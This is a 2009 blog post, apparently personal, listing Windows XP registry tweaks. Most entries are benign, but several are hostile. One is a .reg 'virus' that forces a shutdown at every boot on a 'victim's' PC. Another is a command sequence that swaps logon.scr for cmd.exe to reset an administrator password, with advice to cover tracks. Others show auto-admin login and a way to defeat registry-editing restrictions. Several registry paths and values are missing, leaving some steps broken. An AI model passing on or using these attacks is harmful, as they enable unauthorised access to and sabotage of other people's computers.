Thursday, August 20, 2009

Registry Edits

Well from here i start...My first Technical Post.....Registry edits

Alphabetize your start menus program list

Manual Instructions

1. Click Start -> Programs

2. Mouseover an item on the Programs list

3. Right-click or hit the context menu button (or Shift+F10)

4. Select “Sort by Name” on the context menu that appears

Done, your start menu is sorted.

Infuriatingly simple isn’t it? So why did Microsoft not make this feature automatic?

They did, but you have to go out of your way to force windows to sort it.

Automatic Instructions

[Start]> [Run]> Type “Regedit”
Find the registry key:


Right click MenuOrder in the left pane, click Permissions… then click Advanced button

Remove the checkmark from the “Inherit from parent the permission entries that apply to child objects. Include these with entries explicitly defined here” entry.

In the Security dialog box that opens, click Copy and you’ll be taken back to the Advanced Security Settings for MenuOrder window. Click OK and you’ll return to the Permissions for MenuOrder window.

Clear the checkmark next to Full Control in both your account and all security groups where you are a member.

Do not change the Read permission.

Exit Registry and Reboot

To verify that the tweak has completed successfully, log off the system and log back in then open Start and All Programs menu. Click on one of the items and try to drag it to a new location within the order of the folders. If all went well you will be unable to reposition the item. The black line that normally appears showing where the selected item would be repositioned will either be missing totally or appear as a faint shadow.

Kill Yahoo Chatroom ads...

I found a simple Tweak to rid Yahoo Chat Room windows from those pesky ad banners... wish I could do the same for the huge ad when you first enter chat.

Create a new text document, copy and paste the following...

Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Yahoo\Pager\yurl]
"Finance Disclaimer"=""
"Chat Adurl"=""

Doesn't matter what ya name it, as long as you change it from .txt to .reg. It works well with my Yahoo, should work the same for everyone eles as well. Happy Tweaking!

Allow more than 2 simultaneous downloads in IE 6

This is to increase the the number of max downloads to 10.

1. Start Registry Editor (Regedt32.exe).

2. Locate the following key in the registry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

3. On the Edit menu, click Add Value (a dword) , and then add the following registry values:


4. Quit Registry Editor.

Add a Website link to Start menu

This is a simple registry tweak which adds a website link to your Start Menu.....its very handy for quick access to your favourite website.

To Install : Copy the code below to notepad and save it as link.reg then just right click on it and choose "merge".

Windows Registry Editor Version 5.00




To uninstall : Copy the code below to notepad and save as rem.reg and right click and choose merge.

Windows Registry Editor Version 5.00




Personalize the Start Menu

Windows XP has a nice, new Start menu. And you can customize it more thoroughly than with any earlier version of Windows.

1.Click Start, click Control Panel, click Appearance and Themes, and then click Taskbar and Start Menu.

2.On the Start Menu tab, click either Start menu or Classic Start menu to choose which version of the Start menu to use, and then click Customize.

In the Customize Start Menu dialog box, you can choose what Windows XP displays on the Start menu and in what form. However, there are some Start menu customizations that you can't do through the user interface.

Each time you run a program, Windows XP adds it to the list of frequently-used programs you see on the Start menu. You might not want every program you open to appear on this list, however. For example, I don't want to see Notepad in this list nor do I want to see Command Prompt.

You can choose which programs do and don't pop up in this list by customizing HKCR\Applications. This key contains subkeys for a variety of programs that Windows XP knows about. The name of each subkey is the name of the program file. Thus, you see the subkeys notepad.exe and explorer.exe in HKCR\Applications. If you want to customize other programs, add its subkey to this key. For example, to customize whether Command Prompt appears in the list of frequently used programs, add the subkey cmd.exe to HKCR\Applications. To add a subkey:

1.Open the key under which you want to add a subkey, and then right-click in the right pane.

2.Click New, and then click Key.

3.Type the appropriate subkey.

Then, to keep the program off of the list, add the REG_SZ value NoStartPage to it. Figure 2 shows what this looks like in the registry. To add a value:

1.Open the key under which you want to add a value, and then right-click the right pane.

2.Click New, and then click the type of value, such as String Value, you want to add.

3.Type the appropriate value.

On the Start menu, you can sort the All Programs menu. Windows XP sometimes adds new shortcuts to the bottom of the All Programs menu when you expect them to appear in alphabetical order. In either case, finding the program you want to run is difficult when the sort order of the Start menu gets out of hand.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder contains the sort order of the Favorites menu and Start menu. The subkey Favorites contains the sort order of the Favorites menu. The subkey Start Menu contains the sort order of the classic Start menu, and the subkey Start Menu2 contains the sort order of the new Start menu.

Deciphering the contents of these three keys is next to ridiculous, but you can remove any of them to resort the corresponding menu in alphabetical order. For example, to restore the All Programs menu to alphabetical order, remove the subkey Start Menu2. To remove a subkey:

In the left pane, right-click the subkey you want to remove, and then click Delete.

To restore the Favorites menu in both Windows Explorer and Internet Explorer, remove the subkey Favorites. I typically remove MenuOrder to resort all of the menus at the same time.

Disable Notification Area Balloon Tips in Windows XP

To Disable The Notification Area Balloon Tips
Warning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.
1. Click Start, click Run, type regedit, and then press ENTER.
2. Navigate to the following subkey:
3. Right-click the right pane, create a new DWORD value, and then name it EnableBalloonTips.
4. Double-click this new entry, and then give it a hexadecimal value of 0.
5. Quit Registry Editor. Log off Windows, and then log back on.
These steps disable all Notification Area balloon tips for this user. There is no way to disable balloon tips for specific programs only.

Auto Window Refresh

Whenever you make a change to your windows you have to press F5 or do a manual refresh.
With this tweak you can tell windows to increase the rate at which it does the refreshing.
Navigate to the key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update. Create a newDWORD value, or modify the existing value, named UpdateMode and set it to equal "0" for faster updates. Restart Windows for the change to take effect

Shutdown your friend's computer everytime it start

Thats really easy.

put this followin text in a .reg file and run it in the victims pc:

Windows Registry Editor Version 5.00

"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.

well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.



How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Registry Hacking

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp4 0ext.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:


To this:


Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

protection for system files

To enable protection on system files such as the KnownDLLs list, add the following value;
1. Open RegEdit
2. HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\ SessionManager
3. Create the a Dword value and name it "ProtectionMode "
4. Set the Value to1

Changing the Location of Windows' Installation Fil

If you need to change the drive and or path where Windows looks for its installation files:
1.Open RegEdit
2.Go to
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Setup
3.Edit the value next to SourcePath

Changing the MaxMTU for faster Downloads

There are four Internet settings that can be configured, you can get greater throughput (faster Internet downloads) by modifying a few settings.
They are the MaxMTU, MaxMSS and DefaultRcvWindow, and DefaultTTL
1.Open RegEdit
2.Go to
HKEY_LOCAL_MACHINE\System\CurrentControlset\ Services\ Class\ net\ 000x
(where x is your particular network adapter binding.)
3.Right click on the right panel
4.Select New\String Value and create the value name IPMTU
5.Double click on it and enter then the number you want. The usual change is to 576
6.Similarly, you can add IPMSS and give it a value of 536
(Windows 9X)You can set DefaultRcvWindow, and DefaultTTL by adding these string values to HKEY_LOCAL_MACHINE\ System\ CurrentControlset\ Services\ VXD\ MSTCP
Set the DefaultRcvWindow to"5840"and the DefaultTTL to "128"
Note: These settings will slow down your network access speed slightly, but you will probably not even see the difference if you are using a network card. If you are using Direct Cable you should see a sight difference.

increating the telnet line count

You can view more data if you increase the line count of Telnet. By Default it has a window size of 25 lines. To increase this so you can scroll back and look at a larger number on lines:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\Telnet
3. Modify the value data of "Rows"

disabling ones own comp

In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. Or you can rename it to 20D0HideMyComputer4FE0-3AEA-1069-A2D8-08002B30309D. You can also hide all the Desktop Icons, see Change/Add restrictions.

Setting the Minimum Password Length

1.Open RegEdit
2.Go to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network
3. Now, choose the Edit/New/Binary value command and call the new value MinPwdLen. Press Enter twice and Assign it a value equal to your minimum password length.
Add\delete programs to run every time Windows starts
You can start or stop programs from executing at boot up by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.

Place Windows Kernel into RAM

It’s a given that anything that runs in RAM will be faster than an item that has to
access the hard drive and virtual memory. Rather than have the kernel that is the
foundation of XP using the slower Paging Executive functions, use this hack to create
and set the DisablePagingExecutive DWORD to a value of 1. Perform this hack
only if the system has 256MB or more of installed RAM! Edit the Registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\
Memory Management\DisablePagingExecutive to 1 to disable paging and have the
kernel run in RAM (set the value to 0 to undo this hack). Exit the Registry and reboot.

Enable / Disable Registry Editing tools

It hurts when u saw this msg that "Registry Editing has been disable by your administator"

This can be enable OR Disable by this trick

-> Note
Copy the entire code and save it as "regtools.vbs" without quotes

'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99
Option Explicit
'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
t = "Confirmation"
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
'Create the registry key value for DisableRegistryTools with value 0
WSHShell.RegWrite p, 0, itemtype
End If
'If the key is present, or was created, it is toggled
'Confirmations can be disabled by commenting out
'the two MyBox lines below
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)
End If

Automatically close non-responsive programs

Automatically close non-responsive programs

With a small registry tweak, Windows XP can be set to automatically close any program that 'stops responding' (crashes), eliminating the need for you to use the task manager to close down the offending software manually.

To do this:

Open REGEDIT and navigate to HKEY_CURRENT_USER\Control Panel\ Desktop

Modify the REG_SZ entry AutoEndTasks with a value of 1

Modify Color Selection of Default Theme:

Modify Color Selection of Default Theme:

Open registry by going to Start then Run. Entering regedit, navigate to [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager] and locate the key "ColorName".

Right Click on it and select modify its value from "NormalColor" to "Metallic"

Click Ok, and exit regedit and restart your computer.

Force windows XP to reboot upon crashing

Force windows XP to reboot upon crashing

This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for keeping your system on 24/7:




Edit the 'AutoReboot' value to '1'

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